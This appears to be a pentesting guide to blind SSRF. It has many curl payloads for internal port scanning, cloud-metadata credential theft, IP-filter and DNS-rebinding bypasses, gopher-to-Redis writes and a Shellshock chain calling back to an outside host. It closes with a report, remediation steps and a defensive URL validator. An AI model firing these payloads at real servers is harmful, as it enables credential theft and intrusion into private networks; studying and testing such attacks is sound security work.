```bash
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills
```
- When testing URL/webhook input parameters where server-side responses are not reflected
```bash
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=

# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
  -H "Content-Type: application/json" \
  -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'

# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'

# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'

# Test document import
curl -X POST http://target.com/api/import \
  -H "Content-Type: application/json" \
  -d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
```
```bash
# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com

# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups

# HTTP-based detection
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator

# interact.sh alternative
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions
```
```bash
# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive

# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
  start=$(date +%s%N)
  curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
  end=$(date +%s%N)
  elapsed=$(( (end - start) / 1000000 ))
  echo "$ip: ${elapsed}ms"
done

# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
  curl -X POST http://target.com/api/fetch \
    -d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
  echo "Port $port tested"
done

# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
```
```bash
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'

# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# GCP metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'

# Azure metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
```
```bash
# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'

# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}'   # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}'   # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}'   # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}'        # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}'        # IPv6

# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'

# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'

# DNS rebinding
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
```
```bash
# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration

# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'

# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"

# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints
```
| Concept | Description |
|---|---|
| Blind SSRF | Server makes request but response is not visible to attacker |
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |

| Tool | Purpose |
|---|---|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
| SSRFmap | Automated SSRF detection and exploitation framework |
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
| webhook.site | Free webhook receiver for testing SSRF callbacks |
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |

## Blind SSRF Assessment Report
- **Target**: http://target.com/api/fetch-url
- **Detection Method**: Burp Collaborator DNS + HTTP callback
- **Internal Access Confirmed**: Yes
### Findings
| # | Input Point | Payload | Detection | Impact |
|---|------------|---------|-----------|--------|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |
### Internal Network Map
| Host | Port | Service | Accessible |
|------|------|---------|-----------|
| 10.0.0.5 | 6379 | Redis | Yes |
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
| 169.254.169.254 | 80 | AWS Metadata | Yes |
### Remediation
- Implement allowlist of permitted external domains for URL fetching
- Block requests to private IP ranges and cloud metadata endpoints
- Use IMDSv2 (token-required) for AWS instance metadata
- Disable unused URL schemes (gopher, file, dict)
- Implement network-level segmentation for application servers
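As an added defender-side example (not code from the skill or its author), the Python validator below enforces the remediation list for the `url` / `callback_url` / `avatar_url` / `import_url` inputs tested above: it refuses `gopher://` and non-web ports, rejects every form in the IP-representation and URL-parsing-confusion sections (hex, decimal, octal, short, IPv6, userinfo and fragment tricks, IPv4-mapped IPv6), blocks loopback, RFC 1918 and the 169.254.169.254 metadata address, and resolves a name once so the caller can connect to a pinned IP, which is what defeats the DNS-rebinding bypass. The hostnames, IPs and `demo_resolver` table are constructed for the demo; swap in `default_resolver` for production.

```python
import ipaddress, re, socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # refuse gopher://, file://, dict:// outright
ALLOWED_PORTS = {80, 443}             # the fetcher must not reach 6379, 9200, 27017 ...
# Strict DNS-name shape whose last label starts with a letter. This refuses numeric
# hosts (0x7f000001, 2130706433, 0177.0.0.1, 127.1) that ipaddress rejects but
# getaddrinfo()/inet_aton() would silently turn into 127.0.0.1.
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z][a-z0-9-]{0,62}$")

def default_resolver(host):   # the IP strings the system resolver returns right now
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def demo_resolver(host):      # constructed lookup table so the demo runs offline
    table = {"api.example.com": ["93.184.216.34"],
             "rebind.example.com": ["93.184.216.34", "169.254.169.254"]}
    return table.get(host, [])

def is_blocked_ip(ip):
    # Loopback, link-local (169.254.169.254), RFC 1918, CGNAT, reserved and multicast.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped               # judge ::ffff:127.0.0.1 as 127.0.0.1
    return (not ip.is_global) or ip.is_multicast

def validate_fetch_url(url, resolver=default_resolver):
    """Return (True, pinned_ip) or (False, reason). Connect to pinned_ip with the
    original Host header and re-validate every redirect Location; a second DNS
    lookup at connect time is exactly what rebinding domains exploit."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"   # http://target.com@127.0.0.1/
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        port = None
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    host = parts.hostname or ""
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:                    # not a clean IP literal: must be a DNS name
        if not HOSTNAME_RE.match(host.rstrip(".")):
            return False, "host is neither an IP literal nor a DNS name"
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            addrs = []
    if not addrs or any(is_blocked_ip(ip) for ip in addrs):   # one bad answer fails the name
        return False, "unresolvable host or blocked address"
    return True, str(addrs[0])
```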